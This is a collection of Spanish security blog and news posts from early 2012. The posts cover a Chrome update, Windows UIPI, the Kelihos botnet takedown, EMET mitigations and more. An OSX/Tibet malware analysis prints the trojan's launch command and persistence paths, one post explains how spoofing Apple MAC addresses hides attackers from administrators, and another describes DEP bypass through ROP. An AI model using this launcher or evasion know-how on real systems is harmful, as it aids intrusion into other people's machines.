http://www.criptored.upm.es/paginas/historico2012.htm#mar12
6. OTROS DATOS DE INTERÉS EN LA RED TEMÁTICA
Número actual de miembros en la red: 914
http://www.criptored.upm.es/paginas/particulares.htm

Estadísticas criptored: 52.174 visitas, con 169.228 páginas solicitadas y 57,40 Gigabytes servidos en marzo de 2012, descargándose 33.184 archivos zip o pdf
http://www.criptored.upm.es/estadisticas/awstats.www.criptored.upm.es.html

Estadísticas intypedia: 13.486 reproducciones en marzo de 2012
http://www.criptored.upm.es/paginas/intypediamensual.htm
7. ÚLTIMO MES PARA VOTAR A INTYPEDIA EN LOS PREMIOS INTERNET 2012
Mejor Web 2012 (hasta el 30 de abril de 2012)
http://www.premiosdeinternet.org/index.php?body=ver_candidatura&id_article=2165&id_rubrique=4

Mejor Iniciativa 2012 (hasta el 30 de abril de 2012)
http://www.premiosdeinternet.org/index.php?body=ver_candidatura&id_article=2164&id_rubrique=8

Jorge Ramió Aguirre Coordinador de Criptored twitter: http://twitter.com/#!/criptored

miércoles, 4 de abril de 2012

Windows en los top 20 de los contribuidores de linux

http://windowstecnico.com/archive/2012/04/04/microsoft-entra-en-el-top-20-de-los-contribuidores-de-linux.aspx

martes, 3 de abril de 2012

Actualización de seguridad para Google Chrome

Google ha publicado la nueva rama 18 de su navegador Chrome (con número de versión 18.0.1025.142) para todas las plataformas (Windows, Mac, Linux y Chrome Frame). Esta nueva versión incluye nuevas característica incluyendo gráficos más rápidos. Además también se han corregido nueve vulnerabilidades: tres consideradas de gravedad alta, cinco de nivel medio y una calificada como baja.


Los errores encontrados afectan a diferentes componentes: en EUC-JP, en el tratamiento de texto SVG, de fragmento de texto, un error de comprobación de certificados Proxy SPDY, en el limpiador OpenType, en recortes SVG, en Skia y en v8.

Los CVE asignados a las vulnerabilidades son: CVE-2011-3057 al CVE-2011-3065. Esta versión también incluye la nueva publicación Adobe Flash.

Según la política de la compañía estas vulnerabilidades han supuesto un total de 4.000 dólares en recompensas a los descubridores de los problemas.

Chrome se actualizará automáticamente en los equipos así configurados.

Más información:

Stable Channel Release and Beta Channel Update
http://googlechromereleases.blogspot.com.es/2012/03/stable-channel-release-and-beta-channel.html


Antonio Ropero
antonior@hispasec.com
Twitter: @aropero

De windows 8 va la cosa

http://feedproxy.google.com/~r/WindowsTecnico/~3/hPGpELExYe4/windows-8-un-paso-al-frente.aspx

Windows tecnico

domingo, 1 de abril de 2012

UIPI (User Interface Privilege Isolation) en Windows 8

Una de las tecnologías de seguridad que Microsoft introdujo en la rama 6 del kernel, es decir, Windows Vista (6.0) , Windows 7 (6.1) y por supuesto Windows 8 (6.2) es el uso de la protección UIPI, que en Español viene a ser algo como Aislamiento de Privilegios en el Interfaz de Usuario .





La idea de esta protección es la evitar que procesos poco privilegiados inyecten código en procesos más privilegiados haciendo uso de los mensajes interfaz, es decir, del famoso control de Message Loop que distribuye los eventos entre las aplicaciones.



Este truco de inyectar código mediante eventos de interfaz se había utilizado con éxito desde Windows 95 a Windows XP para conseguir elevaciones de privilegios, algo que hemos visto mediante la inyección de DLLs en programas arrancados para conseguir volcar passwords de servicios, o incluso para modificar en ejecución el comportamiento de un programa - en técnicas de cracking , por ejemplo -.



Desde Windows Vista , con la inclusión de los Niveles de Integridad y de MIC (Mandatory Integrity Control), el envío de mensajes entre aplicaciones está controlado por UIPI y no se puede realizar entre procesos de distintos Niveles de Integridad . Para conseguir que todo funcione correctamente es necesario que UAC (User Account Control) esté activo, por lo que todos los que lo desactivaron tienen eliminada esta protección.

Hace unos días un compañero de Informatica 64 charlaba sobre esto conmigo, y quería comprobar su funcionamiento, así que le conté una de las demostraciones que siempre hacíamos para comprobar que está funcionando este sistema esta protección. Aquí os la dejo.



Testeando UIPI en Windows 8



Para testear que UIPI está funcionando correctamente en tu sistema puedes hacer una prueba que nosotros hacíamos desde Windows Vista , y que es tan sencilla como intentar inyectar una pestaña de un navegador menos privilegiado en un navegador ejecutándose con más privilegios.



En el primer paso yo voy a utilizar Windows 8 y tres instancias de Internet Explorer 10 que están ejecutándose con el mismo nivel de privilegios MIC . Esto se puede comprobar con Process Explorer , o para este caso sencillo con el mismo Task Manager de Windows 8 .





Figura 1: Tres instancias arrancadas, pero que funcionan como una sola.



Como se puede ver, a pesar de que son tres ventanas separadas de Internet Explorer 10 que han sido abiertas con la opción Nuevo Internet Explorer , todas las pestañas son un proceso de la misma instancia de Internet Explorer . Para conocer más de esto puedes leer el post de hundir la flota que escribí hace poco más de dos años.




Figura 2: Es posible unir todas las pestañas en una sola instancia



Si en este entorno se intenta unir una pestaña a otra, puede verse que es posible realizarlo, ya que están corriendo en el mismo nivel MIC . No hay problema y UIPI permite el envío de mensaje al interfaz de la aplicación receptora de la pestaña.



En este otro entorno la instancia de Internet Explorer 10 que se está ejecutando con la web de El lado del mal ha sido arrancada con la opción de Ejecutar como adminsitrador . En el Task Manager se puede ver que son dos procesos totalmente independientes, ya que están en diferentes niveles MIC .




Figura 3: Dos instancias de IE 10 corriendo con diferentes privilegios



Si lo comprobamos con Process Explorer, puede verse que están ejecutándose en distintos Niveles de Integridad (IL).



Figura 4: Las dos instancias de IE 10 funcionan con distintos IL


Cuando se intentan unir las pestañas de ambos navegadores se obtiene un mensaje de prohibición, ya que UIPI está bloqueando el envío de mensajes entre ambos procesos.




Figura 5: UIPI bloquea el envío de mensajes entre ambas



Esta es una de las medidas de seguridad que se introdujeron en el kernel de Windows Vista, que tienes en Windows 7 y en Windows 8 . Si desactivas UAC te cargas del tirón, así que tú mismo.


Saludos Malignos!
Escrito por Chema Alonso
Post: http://feedproxy.google.com/~r/ElLadoDelMal/~3/t0rPN-iqVWw/uipi-user-interface-privilege-isolation.html

Para aprender más sobre Windows: "Máxima Seguridad en Windows: Secretos Técnicos" Publicado en Un informático en el lado del mal - El lado del mal @ Google+ - Suscríbete al canal RSS - Informática 64 - Seguridad Apple - Libros de Seguridad Informática y Hacking

sábado, 31 de marzo de 2012

Desmantelan la segunda botnet Hlux/Kelihos Botnet

La nueva botnet triplica el tamaño de la primera versión. Se han neutralizado ya más de 109.000 servidores infectados cuando la primera sólo afectó a 40.000.
Diario Ti: En su continua persecución contra los operadores de botnets y delitos cibernéticos, los expertos de Kaspersky Lab, junto con CrowdStrike Intelligence Team, Dell SecureWorks y los miembros del Honeynet Project, han trabajado de forma conjunta para poner fin a la segunda botnet Hlux (también conocida como Kelihos). Esta botnet ha triplicado el tamaño de la primera Hlux/Kelihos que se desactivó en el mes de septiembre de 2011. Kaspersky Lab ha neutralizado ya más de 109.000 sistemas infectados cuando en la versión inicial sólo se infectaron 40.000 hosts.

La primera botnet Hlux/Kelihos
Esta no es la primera vez que Kaspersky Lab detecta versiones de la botnet Hlux/Kelihos. En septiembre de 2011, Kaspersky Lab junto a la Unidad de Crimen Digital de Microsoft, SURFnet y Kyrus Tech, Inc., desactivaron con éxito la primera versión de la botnet.

Durante este periodo, Kaspersky Lab llevó a cabo una operación de sinkholing (sistema que hace que todas las comunicaciones que hace de “cabeza” al resto de los bots, no lleguen a su destino, destruyendo la comunicación interna y tomando el control) que desactivó la botnet y su infraestructura de backup desde el servidor Command & Control (C&C).

A pesar de que la botnet original estaba neutralizada y bajo control, los expertos de Kaspersky Lab emprendieron una nueva investigación en enero descubriendo que un segundo Hlux / Kelihos estaba operando. A pesar de que la botnet es nueva, el malware ha sido construido utilizando los mismos códigos que la botnet original. Al igual que la primera versión, la botnet también utilizó la red de ordenadores infectados para enviar spam, robar datos personales, y llevar a cabo el ataque DDoS hacia objetivos específicos.

Cómo se ha desactivado la segunda Hlux/Kelihos
Durante la semana del 19 de marzo, Kaspersky Lab, CrowdStrike Intelligence Team, Dell SecureWorks y Honeynet Project pusieron en marcha una operación de sinkholing que logró deshabilitar la botnet.

Ambas redes eran botnets peer-to-peer (P2P), lo que significa que cada miembro de la red podía actuar como un servidor y/o cliente, a diferencia de las botnets tradicionales que se basan en un único mando y control del servidor C&C. Para neutralizar esta botnet P2P flexible, el grupo de expertos en seguridad ha creado una red global de equipos distribuidos que se han instalado en la infraestructura de la botnet. A medida que más máquinas infectadas se neutralizaban, la arquitectura P2P debilitaba su fuerza de forma exponencial perdiendo el control de los equipos.

Con la mayoría de las redes de bots conectados al sinkholing, los expertos de Kaspersky Lab pueden utilizar la minería de datos para realizar un seguimiento de las infecciones por el número y su ubicación geográfica. Hasta la fecha, Kaspersky Lab ha contado con 109.000 direcciones IP infectadas. La mayoría de las direcciones IP infectadas se encuentra en Polonia.

Kaspersky Lab da las gracias a CrowdStrike Intelligence Team, Dell SecureWorks y Honeynet Project por su apoyo en la operación.

FUENTE :http://www.diarioti.com/noticia/Desmantelan_la_segunda_botnet_Hlux_Kelihos/31424
https://foro.elhacker.net/noticias/deshabilitan_con_exito_la_botnet_hluxkelihos-t340521.0.html

https://foro.elhacker.net/noticias/microsoft_identifica_al_responsable_de_la_botnet_kelihos-t351543.0.html

OSX/Tibet.C se distribuye usando un bug de Offie para mac


El equipo de Alient Vault informó sobre la campaña de distribución de un malware, al que se denominó OSX/Tibet.A, tanto en equipos Windows como en equipos Mac OS X por medio de spam y haciendo uso de un bug conocido de Java. Este era un ataque dirigido a ONGs pro-Tibet con el objetivo de controlar la máquina. Ahora se ha descubierto que se está utilizando también un bug conocido de Office para mac del año 2009 que Microsoft reconoció en el Boletín de Seguridad MS09-27. Este bug permite a un atacante, por medio de un documento Word especialmente malformado, ejecutar comandos en el sistema y tomar el control del equipo.
Los atacantes están enviando spam en el que en un correo electrónico se informa de los abusos de los derechos humanos del pueblo Chino a Tibet , y en el que se adjunta un fichero doc malicioso - catalogado con algunos nombres como TROJ_ARTIEF.AE , Troj/DocOSXDr-A o W97/CodeExec.gen -. Este documento, una vez abierto en una sistema Mac OS X con Office para mac sin parchear, se explota la vulnerabilidad y comienza a ejecutarse todo el proceso.



Figura 1: Spam utilizado para distribuir el exploit en formato .doc

Se copia el archivo file.doc y el script launch-hse en la ruta /tmp , junto con el script que lanza el troyano, que en este caso concreto se llama launch-hse y que ejecuta: #!/bin/sh /tmp/launch-hse & open /tmp/file.doc & Una vez lanzado, el dropper descarga los mismos ficheros que se ejecutaban en la versión anterior, aunque con pequeños cambios el fichero .plist y con el panel de control alojado en unas direcciones IP alojadas en USA .


Figura 2: Fichero .plist utilizado para obtener la persistencia

También se ha descubierto un segundo troyano compilado para diferentes arquitecturas - i386 , PPC , etcétera - que no se había visto hasta el momento, que además arroja un poco más de información en el caso, ya que se han podido descubrir en el fichero un par de rutas locales apuntando a los símbolos de debugging que hacen pensar que el proyecto, que parece un APT en toda regla, se ha denominado longgege y que al backdoor se le llama MacControl . /Developer/longgegeProject/Mac Control/MacControl V1.1.1/build/Foundation_Hello.build/ Release/Foundation_Hello.build/Objects-normal/ppc/Foundation_Hello.o /Developer/longgegeProject/Mac Control/MacControl V1.1.1/build/Foundation_Hello.build/ Release/Foundation_Hello.build/Objects-normal/i386/Foundation_Hello.o Una vez ejectuado se copia a sí mismo en /Library/launched y crea el fichero /Users/{Usuario}/Library/LaunchAgents/com.apple.FolderActionxsl.pslist para conseguir la persistencia tras el reinicio del sistema.
Cada vez que se arranca se conecta a unos servidores en China y envía información sobre la máquina infectada. Por supuesto, este backdoor es un R.A.T. en toda regla y permite tener un control total sobre la máquina de la víctima. Este troyano ya se empieza a detectar por todas las casas de antimalware para Mac OS X y ha recibido otros nombres como OSX/Bckdr-RLG o TSPY_MARADE.AA.


Figura 3: Envío de las credenciales de usuario al panel de control

Desde Seguridad Apple os recomendamos que tengáis actualizado todo el software del sistema - Java u Office para mac incluidos -. Para el caso de Office para mac os recordamos que hay una herramienta que se llama Microsoft AutoUpdate que avisa cada vez que haya una nueva actualización desde Microsoft .
Si tenéis antimalware en Mac OS X, os recomendamos tenerlo con protección activa en tiempo real que permita detectar acciones malicosas en los servicios en base a comportamiento para detectar nuevo malware no firmado, y que actualicéis las bases de datos de firmas para tener las últimas firmas generadas.
Publicado en Seguridad Apple

viernes, 30 de marzo de 2012

Mac Address de Apple: Detectar y/o spoofear un Apple

Las MAC Address que se utilizan los equipos tiene unos bits dedicados al fabricante de las tarjetas. Estos bits se llaman OUI (Organitationally Unique Identifier) y definen la compañía que ha creado el hardware. En los equipos de Apple , como las tarjetas son fabricadas por ellos mismos, es fácil reconocer a un equipo en comunicación como un Apple , lo que puede venir bien en determinadas ocasiones.

La mayoría de las aplicaciones de seguridad de red, como sniffers o scanners, llevan incluida una base de datos de OUI para hacer mucho más cómoda la visualización de datos, pero si no es así, hay herramientas que permiten la consulta online, ayudándote a saber si una MAC Address es de un equipo Apple o, por ejemplo, cuales son los OUI de Apple.

Figura 1: Consulta de OUI asociados al string Apple

El conocer los OUI de un fabricante como Apple , puede ayudar a un pentester a ocultarse mejor en una red, ya que si el pentester no está usando un equipo de Apple , y está haciendo ataques de red poniendo su tarjeta en modo promíscuo o realizando man in the middle a equipos, puede ocultarse mejor debajo de los ojos de un administrador de seguridad suplantando a un equipo Mac . Esto haría que, a primera vista, se buscase un equipo con una manzana, mientras que el atacante trabaja desde su Linux o Windows .




Figura 2: Mac Address de un OUI de Apple




Para generar Mac Address en grandes rangos, hay paginas com MacRandomGenerator, que ayudan a crear listas de Macs de un determinado fabricantes. Todo esto de las Mac Address , puede ser de especial importancia, por ejemplo, a la hora de detectar dispositivos como APs , o equipos WiFi , en una red inalámbrica. Descubre en este libro cómo funciona el mundo del Fraude Online
Publicado en Seguridad Apple

jueves, 29 de marzo de 2012

Go 1, primera versión estable del lenguaje de programación de Google

Google comenzó a trabajar en un lenguaje de programación propio allá por 2007, y el año pasado comenzamos a ver las primeras novedades con una presentación durante el evento Google I/O y luego con varias actualizaciones y adiciones menores. Ahora ha llegado la primera versión estable de este lenguaje, Go versión 1 o directamente Go 1, como los desarrolladores de Google la llaman internamente. Entre las novedades de esta versión tenemos la de estar por primera vez disponible en la forma de binarios compatibles con Windows, FreeBSD, Mac OS X y también varias distros de Linux. Pero además llega el nuevo SDK para Google App Engine con lo que la integración de la criatura de Google con su plataforma de código en la nube comienza a ser más transparente para el usuario (porque hay que recordar que ya estaba disponible esta integración pero mediante algunos pasos y compilaciones varias). Como es de esperar, en Google no van a querer que tanto trabajo sea en vano o que en algún tiempo no sea tan útil, por lo que se han esforzado en aclarar que el código escrito en Go 1 será compatible con futuras versiones de esta rama (1.1, 1.2, etc) salvo excepciones que se espera sean contadas, y tengan que ver con la utilización de algún elemento deprecado de las API por cuestiones de seguridad. Pero han creado unas guías de compatibilidad bastante extensas y detalladas en las cuales se especifica cual es el método más adecuado de desarrollo de código para garantizar que el código escrito hoy siga siendo ejecutado dentro de muchos años.
http://blog.golang.org/2012/03/go-version-1-is-released.html
http://golang.org/


Escrito por Willy Klew
Visual Beta

monocaffe: Changes in Jongo 0.2

Lots of changes are being introduced in Jongo 0.2 which I believe are better suited for the scope of the project.First and most important, I decided to remove the administration console which was to be used as a way for an administrator to customize access to resources, set ID columns and add complex queries. The problem with this approach is that I don't want Jongo to be another tool you have to worry about to keep it running, and most of this things are already on your RDBMS! The basic idea of Jongo: embrace the use of any SQL server.So, the problems the administration console tried to fix should be fixed on the database:Resources permissions. Use an specific user for Jongo, and customize access for this user.Complex Queries. The idea was to allow a GET request to execute a predefined query which is created in Jongo. But why do this when you have triggers, stored procedures, views, etc? So this had to go. Also, stored procedures run faster than running the same query over and over again.If your resource is not using an ID column, this is now supposed to be sent on the requests, p.e. http//.../Jongo/db/resource/1?customId=ridAnother big change being introduced is the correct use of headers in the request and in the response. In 0.1 the "Accept" header wasn't used at all, and this is not acceptable in REST. So now, instead of changing the format as a path parameter, Jongo handles the appropriate headers. On the other hand, response headers include a lot of information about the data being returned: Content-Length, Content-MD5, Content-Count, Date and more depending on the response (error, success, head, stats).During the day I've been working extensively with JAX-RS at work with a project which is very similar to Jongo in how both work, so both of the projects share ideas, and being able to customize the response's JSON and XML is very important. Because of this I've added the "format" parameter to the Accept header. By default the XML and JSON returned by Jongo is the same as in version 0.1 even if this parameter is not set. If the parameter is set like "Accept: application/json;format=jax" then JAX is used to marshal the response. The objective is to allow to develop different formats which can be read without much development on the consumers.I'm also working on tests and trying to achieve a 90% coverage. Doing this is a great exercise on fixing code structure and abstraction. Being able to setup an in-memory database with HSQLDB also helps a lot.Gone is all the code to handle the different database error codes returned by the JDBC drivers. I had the hope (silly me) that the different RDBMSs would follow some sort of standard at least on this, but no, each one of them returns a different SQLStatus & SQLCode for the same error, so it was very frustrating and I didn't want to waste my time researching for the correct codes and their meaning for every different system. The solution? More than a solution, it's a workaround: return the error message and codes to the client and let it handle it as it sees fit. Remember, embrace your database!Another feature gone is the "apps" folder, so by default, you won't be able to use Jongo as a JavaScript application server, although, there's a way to serve static content which I'll explain in the future.Finally, I separated the project in three repositories, one called jongo for all the common code, jongo-jetty for the standalone version and jongo-as which generates a WAR which should be deployed in any application server. I tried to get a version of this WAR working with Google's GAE but it was very frustrating as a PaaS. What I believe is a better service is the one provided by Jelastic and I'll document a guide on how to prepare Jongo's WAR to work with it.That's it for now, I hope the few users of Jongo don't get pissed because of this changes.

Planeta codigo
Escrito por __OVERFLOW__

Adobe Flash Player 11.2: Dos CVE críticos parcheados

Adobe ha lanzado una nueva versión de Flash Player, la 11.2 o más en detalle la número 11.2.202.228. Esta nueva actualización resuelve los problemas de impacto crítico de seguridad, los cuales podrían causar la caída del sistema o lo que es peor, permitir a un atacante ejecutar código arbitrario en la máquina, es decir, tomar el control de la máquina remota.

Figura 1: Adobe Player Installer

Adobe parece estar cansado de todos los problemas de seguridad que está teniendo en los últimos años, los cuales son causa de la pérdida de uso de sus aplicaciones. Adobe ha visto que no puede luchar contra sus vulnerabilidades de código, por lo que ha decido implantar una nueva actualización para el sistema de actualizaciones silenciosas. Los usuarios tendrán 3 opciones que son las siguientes:


- Las actualizaciones se podrán obtener e instalar automáticamente.- Se notificará a los usuarios antes de instalar dichas actualizaciones.- El sistema no comprobará la existencia de las actualizaciones, esta opción no es recomendable de configurar.


Este nuevo sistema de actualizaciones silenciosas sólo está disponible para Windows , pero Adobe ha informado que una versión para Mac OS X está en fase de desarrollo, por lo que en siguientes actualizaciones se podrá contar con la nueva funcionalidad. Para descargar la última versión de Adobe Flash Player se puede descargar desde su página oficial. Las vulnerabilidades que corrige esta nueva actualización son las siguientes:

- CVE-2012-0772: Afecta a todas las plataformas y puede provocar ejecución de código arbitrario tras la visita a un web con código malicios. - CVE-2012-0773: Afecta a todas las plataformas y también puede provocar la ejecución de código arbitrario tras la visita a una web con código malicioso.
Desde Seguridad Apple recomendamos la actualización de la versión de Adobe Flash Player , y configurar el nuevo sistema de actualizaciones para que éstas se descarguen e instalen automáticamente. Descubre en este libro cómo funciona el mundo del Fraude Online
Publicado en Seguridad Apple -
Suscríbete al canal RSS - Sigue Seguridad Apple en Google+

Spam somos y en Black SEO nos convertiremos

Curiosa información me envía el amigo del hacking de los buscadores. Enrique Rando , en su pasión por las búsquedas ha encontrado una red de generación de SEO bastante curiosa . Todos los posts que se publican en esos blogs son mezclas de palabras sin ningún sentido con el objetivo de cumplir los más estrictos objetivos de la buena calidad de los posts para que los buscadores los traten por buenos.






Figura 1: Bonitas cosas dicen de nosotros




Todos tienen el mismo tamaño, y solo dos hipervínculos al final, apuntándose a sí mismos.






Figura 2: Los enlaces de calidad al final




El número de blogs que están haciendo esto son bastantes, y forman una especie de anillo bastante peculiar que puede tratarse de una POC o de un ataque pensado para después vender links de calidad en campañas de SEO y jugar con los algoritmos de Google .



Lo más curioso es que Enrique Rando y yo nos hayamos visto mezclados en uno de ellos. Suponemos que será por nuestros grandes estudios en el arte del SEO , como son los artículos de Técnicas SEO para gente de moral relajada, Hacer estafas de SEO al CEO está FEO, Clientes de Black SEO o el Hot SEO de la cacha hace amigos en Facebook. Spam somos y en BlackSEO nos convertiremos.

Saludos Malignos! Publicado en Un informático en el lado del mal - El lado del mal

Mitigaciones de seguridad en EMETv2.1 (I de III)

EMET es una herramienta que mejora la protección de aplicaciones de terceros y binarios propios de Windows mediante siete técnicas de mitigación. Funciona inyectando una DLL (de 32 o 64 bits) en cada proceso de la aplicación protegida.

En este texto se habla varias veces de compilar con un cierto flag los fuentes de una aplicación. Aunque se utiliza ese término, la fase exacta sería la de enlazado y no de compilación.

Mitigaciones de seguridad


- DEP

Solución hardware y software para prevenir la ejecución de código en páginas de memoria que que no han sido marcadas explícitamente como ejecutables, ya que típicamente se usan para datos (stack, heap). Para esto marca como no ejecutables la pila y el heap, de forma que cualquier intento de ejecución de código en estas zonas será denegado a nivel de procesador. Para utilizar DEP la CPU debe soportar la desactivación de ejecución (XD en Intel y NX en AMD).

En principio sólo se podía hacer uso de DEP si una aplicación había sido compilada con el flag correspondiente /NXCOMPAT. EMET posibilita su uso sin necesidad de recompilar la aplicación; para esto llama a SetProcessDEPPolicy desde el proceso en cual se inyectó la DLL de EMET. En CPUs de 64 bits sobre Windows de 64 bits siempre está activo y no se puede desactivar. Por lo tanto si se invoca a SetProcessDEPPolicy en estas CPUs se produce un fallo.

Se puede evadir mediante una técnica llamada return-to-libc, en la cual se sobreescribe la pila para apuntar a código de librerías (por ejemplo, system en glibc). En este caso no se ejecuta código en la propia pila, y por eso se puede bypassear. Sucede algo parecido con la técnica ROP, donde tampoco se busca ejecutar código en la pila.

Para realizar la técnica ROP es necesario tener el control de la pila. La idea es aprovechar pequeños trozos de código (instrucciones) que ya están en memoria para construir el payload deseado. Para ello se escriben en la pila las direcciones de las instrucciones que interesan. A esto se le llama ROP-gadgets. Éstas instrucciones se ejecutan sin problemas, ya que están ubicadas en páginas de memoria marcadas con permisos de ejecución (NX=0). Finalmente se escribe la shellcode en una zona ejecutable, que previamente estaba en la pila, y se salta a ella. Se puede escribir sobre la sección de código en JIT, ya que requiere que los permisos que se utilicen sean rwx. Sino, se puede hacer uso de VirtualAlloc para establecer todos los permisos o dar permisos de ejecución con VirtualProtect.

Se podría hacer que todo el exploit funcionara a base de ROP puramente, pero típicamente se hace uso de él solo durante la primera fase. Es decir, se persigue como objetivo ejecutar el código que hemos copiado en la pila y no construirlo mediante ROP-gadgets.

Visto que existen técnicas para evitar DEP, es conveniente además hacer uso de otras técnicas de mitigación (ASLR, SHEOP, MIC) para convertirlo en realmente efectivo. Por ejemplo, mediante ASLR el atacante no podrá encontrar las posiciones de memoria donde están situados los ROP-gadgets.

DEP se puede configurar de cuatro maneras diferentes:

optIn: sólo afecta a binarios de Windows y a aplicaciones que explícitamente lo indiquen. Los binarios de 64 bits son la excepción, ya que siempre serán protegidos a menos que se indique lo contrario mediante optOut.


optOut: afecta a todos los binarios, tanto de Windows como de terceros. Se puede indicar explícitamente que algunos binarios no se vean afectados.


AlwaysOn: se aplica a todo el sistema haciendo caso omiso de las excepciones optOut.


Disabled: se desactiva totalmente haciendo caso omiso de las excepciones optIn.


- ASLR

En Windows los ejecutables (EXE y DLL) en principio se cargan en memoria en la dirección base establecida en tiempo de compilación que consta en el propio fichero. Para prevenir la explotación de vulnerabilidades mediante ASLR se aleatoriza esta dirección, de forma que no se utiliza la indicada en el ejecutable.

Es necesario distinguir dos implementaciones de ASLR. La que realiza el propio Windows trabaja con módulos que han sido compilados con un flag específico (IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE), y aleatoriza la dirección base con hasta 256 posibilidades. La segunda implementación es la ofrecida por EMET donde no se necesario indicar nada en tiempo de compilación, y por lo tanto no hace falta recompilar la aplicación. Esto es, si un ejecutable no soporta ASLR de forma nativa, mediante EMET se asigna la dirección de memoria base donde se carga el ejecutable de forma que el cargador de imágenes tenga que buscar una nueva dirección. A esto se le llama Mandatory ASLR (pseudo-ASLR), y tiene una menor entropía que ASLR real: 4 bits frente a 8 en ASLR nativo.

Mandatory ASLR usado conjuntamente con la técnica de mitigación Bottom Up Randomization, implementado en la versión 2.1 de EMET, ofrece una gran protección. La entropía obtenida es la misma que con ASLR real, y además la dirección base cambia cada vez que se inicia la aplicación. Con ASLR nativo esto no ocurre, y además es necesario un reinicio.

En EMET la mitigación Mandatory ASLR fuerza la relocalización de DLLs que han sido cargadas posteriormente a EMET.DLL. Por lo tanto no se aleatoriza con EMET ni la propia imagen core ni las librerías estáticas empotradas en él. Cuando EMET se carga hace un hook a LdrLoadDll y comprueba por cada módulo que se vaya a cargar el bit IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE. Si no está presente implica que la DLL no ha sido enlazada con el flag ASLR, por lo tanto se fuerza pseudo-ASLR preasignando una página de la dirección base para que el operativo la cargue en otra dirección.

Para comprobar si EMET está funcionando correctamente con ASLR podemos usar Process Explorer de la suite Sysinternals. Primero hay que tener en cuenta que los módulos que marca como ASLR son los que han sido compilados específicamente para ello; es decir, aquellos con los que trabaja Windows y no EMET. Para poder ver los que EMET ha forzado la relocalización hay que ir a Options-Configure Colors y activar Relocated DLLs. Después indicaremos que queremos que se muestren las DLLs mediante View-Show Lower Pane y finalmente View-Lower Pane View-DLLs. Entonces al pinchar sobre un proceso protegido con ASLR en EMET, si no utiliza DLLs compiladas con dynamic base, veremos que han sido relocalizadas mediante EMET (las mostrará de amarillo si se utiliza el color por defecto).

Artículo cortesía de David Montero
Extraido de www.securitybydefault.com

miércoles, 28 de marzo de 2012

2 millones de dólares en Italia,Apple condenado a pagar 1


Apple ha perdido la apelación que presentó en un caso en Italia y deberá abonar 1,2 millones de dólares o, aproximadamente, 900.000 euros. La compañia fue multada por haber, supuestamente, presentado una cantidad no real sobre las garantías de los productos y la estipulación de ésta. La decisión fue tomada este jueves y dictada por el presidente del tribunal administrativo regional de Italia.

¿Dónde comenzó todo?
Hay que remontarse al año pasado y encontrar la sanción a Apple por no proporcionar información sobre la duración concreta de las garantías de sus productos, con lo que fue multado con 400.000 Euros , y además un extra de 500.000 Euros por la falta de información sobre las garantías extendidas de Apple Care en Italia .



La multa fue la consecuencia directa de una investigación que se realizó a Apple en Italia por prácticas desleales de marketing o comerciales. Apple empujaba a los consumidores a realizar un pago por el Apple Care con valor de 2 años, cuando según las leyes de la Unión Europea requieren que las compañias ofrezcan las mismas condiciones sin coste alguno.
A partir de ahora, con la decisión tomada el jueves, Apple debe agregar una nota informativa en sus embalajes para informar a sus clientes de que se disponen de 2 años de garantía por ley. Apple sigue pensando en presentar una segunda apelación, a pesar, de que no ha habido ningún anuncio oficial sobre cuando va a suceder. Apple Care se encuentra disponible para toda la gama de productos desde iPad , hasta iPhone , pasando por máquinas Mac . El coste varía en función del producto, pero la cobertura incluye soporte telefónico y reparación en tienda.
'La que se viene encima', podría ser el titular con el que se hable de Apple en las próximas fechas. Tras la multa de los 900.000 Euros , hay otros 11 grupos de consumidores europeos que se unen al ataque contra la empresa de Cupertino . El tema va a dar que hablar en Europa y desde Seguridad Apple estaremos atentos a lo que suceda.

Publicado en Seguridad Apple -

La policía, principal cliente de este software que permite crackear tu móvil

Publicado el 28 de marzo de 2012 por Nerea Bilbao La compañía sueca Miro Systemation, con base en Estocolmo se está haciendo de oro vendiendo software para hackear smartphones, y sus principales clientes son autoridades policiales. Y el negocio le va viento en popa. Systemation Micro ha crecido un 25% en un año y ha ingresado 18 millones de dólares, 6 más que en 2010 y ha doblado el número de empleados desde 2009. Desde la compañía aseguran que tienen clientes hasta en 60 paí...

domingo, 25 de marzo de 2012

STI/asLAN: Concurso de falsificadores de firmas


Este año SmartAccess ha planteado una actividad muy curiosa como concurso para poner a prueba la tecnología de firma biométrica en dispositivos móviles SealSign (Tenemos que hablar de eso de la usar una foca en el nombre) que va a realizar en SITI/asLan.

Los que hayáis venido a las sesiones de Up To Secure 2012 ya sabéis que SealSign es una solución de firma biométrica y digital pensada para ser utilizada en dispositivos móviles que ejecuten Android, iOS o Windows en ella.

El algoritmo que lleva dentro se ha desarrollado siguiendo las técnicas de reconocimiento grafológico que utilizan los peritos para determinar si una firma ha sido hecho o no por la misma persona, y la solución ha sido validada por abogados de Ecija para ser utilizada como elemento probatorio en un juicio.

Para que pruebes tú mismo si la solución es buena o no, en le próximo SITI/asLAN de Madrid que tiene lugar los días 27, 28 y 29 de Marzo, en el stand de SmartAccess C5 vas a poder intentar falsificar una firma. Sólo por intentar falsificar la firma vas a ganar una tableta... de chocolate, que puede convertirse en un Samsung Note si consigues demostrar que eres un auténtico falsificador.



Allí además podrás ver las soluciones portafirmas que puedes incorporar a las aplicaciones corporativas de tu empresa para introducir la firma biométrica y/o digital como parte de los procesos de control de tu empresa, para sustituir en la medida de las posibilidades el papel.

Después de años trabajando juntos, haciendo el libro del DNIe, colaborando en el FTSAI donde imparten la parte de autenticación fuerte de servidores, y yéndonos de gira juntos, hemos llegado a un acuerdo de partnership con SmartAccess para distribuir la solución SealSign y adaptar las aplicaciones de firma biométrica y digital a las necesidades de los clientes, para que funcionen en Android, iPad o dispositivos con Windows. Si quieres más información sobre esta solución, ponte en contacto con nosotros y te daremos mucha más información.

Debido a esto, también estaremos compartiendo stand en SITI/asLAN con ellos, donde podrás adquirir los libros de Informática64 y obtener información de nuestros servicios de consultoría de sistemas, auditoría de seguridad, cursos de formación o de software como MetaShield Protector o la Forensic FOCA. ¡Nos vemos en la feria!

Escrito por Chema Alonso
www.elladodelmal.com

Un saludo

sábado, 24 de marzo de 2012

Exploit de Joomla paso a paso

En esta entrada voy a tratar de explicar cómo hacer un exploit paso a paso para Joomla 2.5.0-2.5.1 o 1.7.0-1.7.5, de la forma más sencilla posible y explicando conceptos básicos de inyecciones de SQL y alguno un poco más avanzado, ya que en este caso se hace el ataque basado en tiempo.
Para este ejercicio lo ideal es que montéis un Joomla versión 2.5.1 por defecto en vuestro sistema y podáis acceder localmente para ir haciendo las pruebas.
